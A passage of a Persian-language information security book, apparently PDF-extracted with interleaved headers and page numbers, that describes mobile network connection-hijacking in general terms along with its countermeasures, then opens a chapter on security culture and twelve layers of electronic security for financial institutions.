‫ ﻛﻪ ﻣﻬﺎﺟﻢ ﻣﻴﺎﻥ ﺷﺒﻜﺔ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﺓ ﺧﺪﻣﺎﺕ ﻭ ﺍﻭ ﺑﺮﻗﺮﺍﺭ ﻛـﺮﺩﻩ‬‫ ﺁﻏﺎﺯ ﻣﻲﻛﻨﺪ ﻭ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻋﻨﺎﺻﺮ ﺍﺭﺳﺎﻝ ﺳﻴﮕﻨﺎﻟﻬﺎ ﻃﻮﺭﻱ‬‫ﺗﻐﻴﻴﺮ ﻛﻨﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺷﺒﻜﻪ ﺍﻳﻨﻄﻮﺭ ﺑﻨﻈﺮ ﺑﺮﺳﺪ ﻛﻪ ﮔﻮﻳﻲ ﻛـﺎﺭﺑﺮ‬
‫ﻣﻮﺭﺩ ﻧﻈﺮ ﻧﻤﻲﺧﻮﺍﻫﺪ ﺩﺭ ﺗﺒﺎﺩﻝ ﺩﺍﺩﻩﻫـﺎ ﺍﺯ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﻨﺪ‪ .‬ﭘﺲ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ،‬ﻣﻬﺎﺟﻢ ﺍﺭﺗﺒـﺎﻁ ﺧـﻮﺩ ﺑـﺎ ﻛـﺎﺭﺑﺮ ﺭﺍ‬
‫ﻗﻄﻊ ﻣـﻲﻛﻨـﺪ ﻭ ﺑـﺎ ﺣـﻖﺍﺷـﺘﺮﺍﻙ ﺁﻥ ﻛـﺎﺭﺑﺮ‪ ،‬ﺍﺯ ﺷـﺒﻜﻪ ﺑـﺮﺍﻱ‬
‫ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺳﻬﺎﻱ ﺟﻌﻠﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺟﺎﻣﻌﻴﺖ ﭘﻴﺎﻣﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻳـﻦ ﻧـﻮﻉ‬
‫ﺣﻤﻠﻪ ﻣﻨﺠـﺮ ﺷـﻮﺩ‪ .‬ﺑﻄـﻮﺭ ﺧـﺎﺹ‪ ،‬ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺩﺍﺩﻩﻫـﺎ ﻭ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﺭﺳﺎﻝ ﻏﻴﺮﻣﺴﺘﻘﻴﻢ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺍﺗﺼﺎﻝ‪ ،‬ﺑﻪ ﺷﺒﻜﻪ‬
‫ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺍﻋﺘﺒﺎﺭ ﺩﺭﺧﻮﺍﺳـﺘﻬﺎﻱ ﻣـﺸﺮﻭﻉ ﺭﺍ ﺗـﺸﺨﻴﺺ‬
‫ﻱ ﭘﻴﺎﻣﻬﺎﻱ ﺣﻔﺎﻇﺖﺷﺪﺓ ﺟﺎﻣﻌﻴـﺖ ﺩﺭ‬
‫ﺩﻫﺪ‪ .‬ﺑﻌﻼﻭﻩ ﺍﺭﺳﺎﻝ ﺩﻭﺭﻩﺍ ﹺ‬
‫ﻃﻮﻝ ﻳﻚ ﺍﺗﺼﺎﻝ‪ ،‬ﺑﻪ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺳﺮﻗﺖ ﺍﺗـﺼﺎﻻﺕ ﺭﻣﺰﻧـﺸﺪﻩ‬
‫ﭘﺲ ﺍﺯ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻭﻟﻴﺔ ﺍﺗﺼﺎﻝ ﻛﻤﻚ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺳـﺮﻗﺖ‬
‫ﺍﺗﺼﺎﻝ ﻣﻴـﺎﻥ ﭘﻴﺎﻣﻬـﺎﻱ ﺩﻭﺭﻩﺍﻱ ﺣﻔـﺎﻇﺘﻲ ﻧﻴـﺰ ﻣﻤﻜـﻦ ﺍﺳـﺖ‪،‬‬
‫ﻻ ﭼﻨﺪﺍﻥ ﺑﻜﺎﺭ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﻧﻤـﻲﺁﻳـﺪ‪ .‬ﺑﻄـﻮﺭ ﻛﻠـﻲ‬
‫ﻫﺮﭼﻨﺪ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺗﺼﺎﻻﺗﻲ ﻛﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺁﻧﻬﺎ ﻏﻴﺮﻓﻌﺎﻝ ﺍﺳﺖ ﻫﻤﻴـﺸﻪ ﺩﺭ ﺑﺮﺍﺑـﺮ‬
‫ﺩﺳﺘﻪﺍﻱ ﺍﺯ ﺣﻤﻼﺕ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﻣﺠﺪﺩﹰﺍ ﺍﻳﻦ ﻧﻜﺘﻪ ﺭﺍ ﻳﺎﺩﺁﻭﺭﻱ ﻣﻲﻛﻨﻴﻢ ﻛﻪ ﺍﻳﻦ ﻗﺒﻴﻞ ﺣﻤﻼﺕ ﺑـﺮ‬
‫ﺍﺳﺎﺱ ﺍﻳﻨﻜﻪ ﻓﻨﺎﻭﺭﻱ ﭼﮕﻮﻧﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴـﺮﺩ ﻫﻤﮕـﻲ‬
‫ﺟﻨﺒﺔ ﺗﺌﻮﺭﻱ ﺩﺍﺭﻧﺪ‪ .‬ﺩﺭ ﻛﻞ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧـﺴﻞ ﺳـﻮﻡ ﺍﺯ ﻟﺤـﺎﻅ‬
‫ﻓﻨﺎﻭﺭﻱ ﺍﻣﻨﻴﺘﻲ ﭘﻴﺸﺮﻓﺖ ﻛﺮﺩﻩﺍﻧﺪ‪ ،‬ﺍﻣﺎ ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺍﻣﻨﻴـﺖ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﺳﻴﺎﺭ‪ ،‬ﻻﺯﻣﺴﺖ ‪ ،‬ﺳﺎﻳﺮ ﻣﺮﺍﻗﺒﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﺑﺼﻮﺭﺕ‬
‫ﻣﺪﺍﻭﻡ ﺭﻋﺎﻳﺖ ﺷﻮﻧﺪ‪.‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺯ‪.‬‬
‫ﻧﺘﻴﺠﻪﮔﻴﺮﻱ‬
‫ﺑﺎﻳﺪ ﮔﻔﺖ ﻛﻪ ﻫﺮ ﭼﻪ ﺷﺒﻜﻪﻫﺎ ﺑﻴﺸﺘﺮ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺑﺎﺷﻨﺪ‪ ،‬ﻗﺎﺑﻠﻴـﺖ‬
‫ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻭ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻣﺠـﺎﺯ ﺩﺭ ﺁﻧﻬـﺎ ﺑﻴـﺸﺘﺮ ﻣـﻲﺷـﻮﺩ‪.‬‬
‫ﻻ ﺩﺭ ﻧﻘﺎﻃﻲ ﺍﺳﺖ ﻛﻪ‬
‫ﺑﻴﺸﺘﺮﻳﻦ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻣﻌﻤﻮ ﹰ‬
‫ﻛﺎﺑﻠﻬﺎﻱ ﻓﻴﺒﺮ‪ ،‬ﺳﻴﻤﻬﺎﻱ ﻣﺴﻲ‪ ،‬ﻣﺎﻫﻮﺍﺭﻩ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻲﺳـﻴﻢ‬
‫ﺯﻣﻴﻨﻲ ﺑﻪ ﻫﻢ ﻣﺘﺼﻞ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻭﺍﺳﻄﻬﺎﻱ ﻫﻮﺍﻳﻲ‬
‫ﻳﻜــﻲ ﺍﺯ ﻣﺜﺎﻟﻬــﺎﻱ ﻣﺨــﺎﺑﺮﺍﺕ ﻣــﺪﺭﻥ ﻭ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﻓﻨــﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻮﺭﺩ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪.‬‬
‫ﻳﻚ ﺭﺍﻩﺣﻞ ﻣﻤﻜﻦ‪ ،‬ﺑﺎﺯﻧﮕﺮﻱ ﺩﺭ ﻣﺪﻝ ﻫﻔﺖﻻﻳـﻪﺍﻱ ﻣﺨـﺎﺑﺮﺍﺕ‬
‫‪ ISO‬ﻭ ﺑﻄﻮﺭ ﺧﺎﺹ ﺍﻳﺠﺎﺩ ﻳـﻚ ﻻﻳـﺔ ﺟﺪﻳـﺪ ‪ -‬ﺑـﺮﺍﻱ ﺗـﺄﻣﻴﻦ‬
‫ﺍﻣﻨﻴﺖ ﻻﺯﻡ ﺑﺮ ﻣﺒﻨﺎﻱ ﻳﻚ ﻛﺪ ‪ ۲۵۶‬ﻳﺎ ﺣﺘـﻲ ‪ ۱۰۲۴‬ﺑﻴﺘـﻲ ﻛـﻪ‬
‫ﻗﺎﺑﻞ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺑﺎﺷﺪ ‪ -‬ﺍﺳـﺖ‪ .‬ﺍﻳﻨﻜـﻪ ﺭﺍﻩﺣـﻞ ﻧﻬـﺎﻳﻲ ﺑـﺮﺍﻱ‬
‫ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﻳﻦ ﻫﺪﻑ ﺍﻳﺠﺎﺩ ﻳﻚ ﻻﻳﺔ ﺟﺪﻳﺪ ﺍﺳﺖ ﻳﺎ ﻣﻲﺗـﻮﺍﻥ‬
‫ﺍﺯ ﻣﻬﻨﺪﺳﻲ ﻣﺠﺪﺩ ﻗﺴﻤﺘﻲ ﺍﺯ ﻻﻳﻪﻫـﺎﻱ ﻓﻌﻠـﻲ ﻧﺘـﺎﻳﺞ ﺑﻬﺘـﺮﻱ‬
‫ﮔﺮﻓﺖ ﻫﻤﭽﻨﺎﻥ ﺑﻪ ﻣﻄﺎﻟﻌـﻪ ﺑﻴـﺸﺘﺮ ﻧﻴـﺎﺯ ﺩﺍﺭﺩ‪ .‬ﺑـﻪ ﻫـﺮ ﺗﺮﺗﻴـﺐ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﻲﺳﻴﻢ ﻫﻤﭽﻨﺎﻥ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺍﺳﺖ‪.‬‬
‫ﺗﻬﺪﻳــﺪﻫﺎﻳﻲ ﻛــﻪ ﺍﺯ ﺟﺎﻧــﺐ ﭘﺮﻭﺗﻜﻠﻬــﺎﻱ ‪ 802.11‬ﻭ ‪GSM‬‬
‫ﻣﺘﻮﺟﻪ ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭ ﺟﺎﻣﻌﻴﺖ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷﺪﻩ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺗﺎ ﺣـﺪ‬
‫ﺯﻳﺎﺩﻱ ﻛﺎﻫﺶ ﺩﺍﺩ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪VPN‬ﻫـﺎ‪ ،‬ﺣﻔﺎﻇـﺖ ﺍﺯ‬
‫‪gateway‬ﻫﺎ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻫﻢ ﺑـﺴﻴﺎﺭ ﺿـﺮﻭﺭﻱ ﺍﺳـﺖ‪.‬‬
‫ﺍﻳﻦ ﻧﻜﺘﻪ ﺑﺮﺍﻱ ﺑﺎﻧﻜﻬﺎ ﺑﺴﻴﺎﺭ ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﻛﻨﺎﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ‬
‫‪ VPN‬ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺩﺳﺘﺮﺳﻲ ﻣﺠﺎﺯ‪ ،‬ﺭﻭﺷﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺩﻳﮕـﺮ‬
‫ﺭﺍ ﻧﻴﺰ ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺷـﺒﻜﻪ ﺑﻜـﺎﺭ ﮔﻴﺮﻧـﺪ‪ .‬ﺑﺎﻧﻜﻬـﺎ ﻭ‬
‫ﺷﺮﻛﺎﻱ ﻣﺨﺎﺑﺮﺍﺗﻲ ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﺑـﻪ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺳـﺎﺯ ﻭ ﻛﺎﺭﻫـﺎﻱ‬
‫ﺍﻣﻨﻴﺖ ﭼﻨﺪﻻﻳﻪ ﺑﺨﺼﻮﺹ ﺩﺭ ﺳﻄﺢ ‪gateway‬ﻫﺎ ﺍﻗﺪﺍﻡ ﻛﻨﻨﺪ‪.‬‬
‫ﺑﻪ ﻣﻮﺍﺯﺍﺕ ﺍﺳﺘﻔﺎﺩﺓ ﺭﻭﺯﺍﻓﺰﻭﻥ ﺗﺠـﺎﺭﺕ ﻭ ﺍﻗﺘـﺼﺎﺩ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ‬
‫ﻳﻜﭙﺎﺭﭼﻪ ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮ‪ ،‬ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ ﻓﻨـﺎﻭﺭﻱ ﺍﺭﺗﺒﺎﻃـﺎﺕ‬
‫‪181 Pelton Merge‬‬
‫ﺳﻴﺎﺭ ﺣﻴﺎﺗﻲﺗﺮ ﻣﻲ ﺷﻮﺩ‪ .‬ﺳﺎﺯﮔﺎﺭﻱ ﺭﻭﺯﺍﻓﺰﻭﻥ ﻧﻬﺎﺩﻫﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ‬
‫ﺑﺎ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ ﻭ ﻓﻨﺎﻭﺭﻱ ‪ GSM‬ﺑﺎﻋـﺚ ﺗـﻀﻌﻴﻒ‬
‫ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﺭﻳﺎﻓﺖ ﻭ ﭘﺮﺩﺍﺧـﺖ ﺷـﺪﻩ‪ ،‬ﻭ ﺍﻳـﻦ ﺩﺭﺣـﺎﻟﻲ‬
‫ﺍﺳــﺖ ﻛــﻪ ﺍﻳــﻦ ﻭﺍﺳــﻄﻬﺎﻱ ﻧﻔﻮﺫﭘــﺬﻳﺮ ﺍﺳﺎﺳ ـﹰﺎ ﺑــﺮﺍﻱ ﺗﺒــﺎﺩﻝ‬
‫ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻃﺮﺍﺣﻲ ﻧﺸﺪﻩ ﺑﻮﺩﻧـﺪ‪ .‬ﺩﺭ ﻫﻤﺎﻧﺤـﺎﻝ ﻛـﻪ‬
‫ﮔﺮﺍﻳﺸﻬﺎﻱ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺩﺍﻣﻪ ﻣﻲﻳﺎﺑـﺪ‪" ،‬ﻣـﺪﻳﺮﻳﺖ‬
‫ﺶﺭﻭ ﺑﺮﺍﻱ ﺻﻨﻌﺖ ﺑﺎﻧﻜﺪﺍﺭﻱ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺳﻴﺎﺭ" ﻧﻴﺰ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﭘﻴ ﹺ‬
‫ﺍﻫﻤﻴﺖ ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ﺧﻮﺍﻫﺪ ﻳﺎﻓﺖ‪.‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﭘﻠﺘﻦ ﻣﺮﺝ‪ ١٨١‬ﺍﺷﺎﺭﻩ ﻛﺮﺩﻩ‪" ،‬ﺍﻳﻦ ﮔـﺮﺍﻳﺶ ﺑـﺎﺯﺍﺭ ﺑـﻪ‬
‫ﺗﺪﺍﻭﻡ ﺍﺭﺗﻘﺎﻱ ﻛﻴﻔﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻳﻜﭙﺎﺭﭼﺔ ﻭﺍﺳﻂﻫﺎ ﺑـﻮﺩﻩ ﻛـﻪ‬
‫ﺍﻣﻜﺎﻥ ﺍﺗﺼﺎﻝ ﺑﻲﻋﻴﺐ ﻭ ﻧﻘﺺ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﻣﺜـﻞ ﻓﻴﺒـﺮ‪،‬‬
‫ﺳﻴﻤﻬﺎﻱ ﻣﺴﻲ‪ ،‬ﺑﻲ ﺳﻴﻢ ﺯﻣﻴﻨﻲ‪ ،‬ﻣـﺎﻫﻮﺍﺭﻩ ﻭ ﺩﻳﮕـﺮ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ‬
‫ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﺭﺍ ﻓﺮﺍﻫﻢ ﻛﺮﺩﻩ‪ ،‬ﺍﻣﺎ ﭼﺎﻟﺶ ﺁﻧﺠﺎ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳـﺪ ﻛـﻪ‬
‫ﺑﺨﻮﺍﻫﻴﻢ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﺗﻬﻴﻪ ﻛﻨﻴﻢ ﻛﻪ ﺩﺭ ﻋﻴﻦ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ‬
‫ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﺳﺎﺩﻩ ﻣﻴﺎﻥ ﺍﻳﻦ ﻓﻨﺎﻭﺭﻳﻬﺎ‪ ،‬ﺍﻣﻨﻴﺖ ﺭﺍ ﻧﻴـﺰ ﻓـﺮﺍﻫﻢ‬
‫ﻛﻨﺪ‪".‬‬
‫‪١٩٥‬‬
‫‪١٩٧‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‪:‬‬
‫ﺩﻭﺍﺯﺩﻩ ﻻﻳﺔ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﻓﺼﻞ ﻳﺎﺯﺩﻫﻢ‬
‫ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‪:‬‬
‫ﺍﻳﺠﺎﺩ ﻓﺮﻫﻨﮓ ﺍﻣﻨﻴﺖ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﻧﻮﻋﻲ ﻓﺮﺁﻳﻨـﺪ ﺩﻭﻭﺟﻬـﻲ‬
‫ﺩﺍﻧﺴﺖ‪ .‬ﺍﻭﻟﻴﻦ ﻣﺮﺣﻠﺔ ﺁﻥ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﺍﺳﺖ ﻛﻪ ﺷﺎﻣﻞ ﺳـﻪ‬
‫ﻗﺴﻤﺖ ﻋﻤﺪﻩ ﻣﻲ ﺑﺎﺷﺪ‪ :‬ﺷﻨﺎﺳﺎﺋﻲ ﻭ ﺟﻤﻊﺁﻭﺭﻱ ﺩﺍﺭﺍﺋﻴﻬﺎ‪ ،‬ﺗﺠﺰﻳـﻪ‬
‫ﻭ ﺗﺤﻠﻴﻞ ﻭ ﺗﻌﻴـﻴﻦ ﺍﺭﺯﺵ ﻫﺮﻳـﻚ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬـﺎ‪ ،‬ﻭ ﺗﻌﻴـﻴﻦ ﺍﻳﻨﻜـﻪ‬
‫ﻫﺮﻛﺪﺍﻡ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬﺎ ﺑﻪ ﺗﺮﺗﻴﺐ ﺍﻭﻟﻮﻳﺖ ﭼﻘﺪﺭ ﺣﻴﺎﺗﻲ ﻫﺴﺘﻨﺪ‪ .‬ﮔـﺎﻡ‬
‫ﺩﻭﻡ ﺍﻣﻨﻴﺖ‪ ،‬ﺗﺪﻭﻳﻦ ﻳﻚ ﺷﻴﻮﻩ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﺍﺳـﺖ‪.‬‬
‫ﻗﺴﻤﺘﻬﺎﻱ ﻋﻤﺪﺓ ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺗـﺪﻭﻳﻦ ﻭ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ‬
‫ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻛﺎﺭﻱ‪ ،‬ﺁﻣﻮﺯﺵ ﻛﺎﺭﺑﺮﺍﻥ )ﺍﻋـﻢ ﺍﺯ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﻭ‬
‫ﻣﺸﺘﺮﻳﺎﻥ( ﻭ ﺑﺎﺯﺑﻴﻨﻲ ﻭ ﻧﻈﺎﺭﺕ ﺑﺮﺍﻱ ﺗـﻀﻤﻴﻦ ﻭ ﻛﻨﺘـﺮﻝ ﻛﻴﻔﻴـﺖ‪.‬‬
‫ﻳﻚ ﻧﻈﺮﻳﺔ ﻣﻌﻘﻮﻝ ﺑﻴﺎﻥ ﻣﻲﻛﻨﺪ ﻛﻪ‪" :‬ﺑﭙﺬﻳﺮ ﻛـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﻫﺪﻑ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻱ؛ ﻭ ﺑﺮﺍﻱ ﻧﺠﺎﺕ ﺧﻮﺩ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻛﻦ"‪.‬‬
‫ﺳﻪ ﺍﺻﻞ ﻛﻠﻲ ﻛﻪ ﺩﺭ ﺗﺪﻭﻳﻦ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺘـﻲ ﺑﺎﻳـﺪ ﻣـﺪﻧﻈﺮ‬
‫ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﺑﻌﺒﺎﺭﺕ ﺯﻳﺮ ﻫﺴﺘﻨﺪ‪:‬‬
‫•‬
‫•‬
‫•‬
‫ﺣﻤﻼﺕ ﻭ ﺁﺳﻴﺒﻬﺎ ﺍﺟﺘﻨﺎﺏﻧﺎﭘﺬﻳﺮﻧﺪ؛‬
‫ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻓﺮﺁﻳﻨﺪﻱ ﺯﻣﺎﻧﮕﻴﺮ ﺍﺳﺖ؛ ﻭ‬
‫ﻳﻚ ﺷﺒﻜﻪ‪ ،‬ﺣﺪﺍﻛﺜﺮ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺿﻌﻴﻔﺘﺮﻳﻦ ﺟﺰﺀ ﺧﻮﺩ‪ ،‬ﺍﻳﻤﻦ‬
‫ﺍﺳﺖ‪.‬‬
‫ﺑﺮﺍﻱ ﺣﻔﻆ ﺟﺎﻣﻌﻴﺖ ﺩﺍﺩﻩﻫﺎ ﻭ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺤﻴﻂﻫﺎﻱ ﺑـﺎ‬
‫ﻣﻌﻤﺎﺭﻱ ﺑﺎﺯ‪ ،‬ﺩﻭﺍﺯﺩﻩ ﻻﻳﺔ ﺍﺻﻠﻲ ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ؛‬
‫ﻭ ﻃﺒﻖ ﺗﺠﺮﺑﻪ ﻣﺸﺨﺺ ﺷﺪﻩ ﻛﻪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺻﺤﻴﺢ ﻫﻴﭽﻴـﻚ‬
‫ﺍﺯ ﺍﻳﻦ ﻻﻳﻪﻫﺎ ﺑﻪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻫﻨﮕﻔﺘﻲ ﻧﻴﺎﺯ ﻧﺪﺍﺭﺩ‪.‬‬
‫‪.۱‬‬
‫ﻣﺴﺌﻮﻝ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ‪ -‬ﺍﻳﺠﺎﺩ ﺳـﻤﺖ ﻣـﺪﻳﺮﻳﺖ‬
‫ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻛﻪ ﺍﺯ ﺗﻮﺟﻪ ﺑـﻪ ﻳـﺎﺯﺩﻩ ﻻﻳـﺔ ﺩﻳﮕـﺮ ﺩﺭ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻭ ﭘﻴﺎﺩﻩﺳـﺎﺯﻱ ﺻـﺤﻴﺢ ﺁﻧﻬـﺎ ﻃﺒـﻖ‬
‫‪١٨٣‬‬
‫ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺯﻳﺮ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪ ۱۸۲‬ﻣﻨﺒﻊ‪:‬‬
‫‪Glaessner, Thomas, Kellerman, Tom,‬‬
‫‪McNevin, "Electronic Security: Risk Mitigation‬‬
‫‪in Financial Transactions - Public Policy‬‬
‫‪Issues", June 2002, The World Bank‬‬
‫‪ ۱۸۳‬ﺑــﺮﺍﻱ ﺟﺰﺋﻴــﺎﺕ ﺑﻴــﺸﺘﺮ ﺑــﻪ ﻛﺘــﺎﺏ ﺯﻳــﺮ ﻧﻮﺷــﺘﺔ ‪،Glaessner‬‬
‫‪ ،Kellerman‬ﻭ ‪ McNevin‬ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫‪"Electronics Security: Risk Mitigation in‬‬
‫"‪Financial Transaction‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺗﺎ ﺍﻳﻨﺠـﺎﻱ ﺑﺨـﺶ ﺳـﻮﻡ ﻧﻘـﺶ ﺍﻣﻨﻴـﺖ ﻭ ﻛﺎﺭﻛﺮﺩﻫـﺎﻱ ﺁﻥ ﺩﺭ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠـﻒ ﺍﻋـﻢ ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼـﻚ ﻭ ﻣﺘﻮﺳـﻂ‪،‬‬
‫ﻣﺆﺳﺴﺎﺕ ﻏﻴﺮ ﺍﻧﺘﻔـﺎﻋﻲ‪ ،‬ﺁﻣﻮﺯﺷـﮕﺎﻫﻬﺎ‪ ،‬ﻭ ﺍﺩﺍﺭﺍﺕ ﺩﻭﻟﺘـﻲ ﻣـﻮﺭﺩ‬
‫ﻣﻄﺎﻟﻌﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺖ‪ .‬ﺩﺭ ﺑﺤﺜﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺩﺭ ﺍﻣﻨﻴـﺖ‬
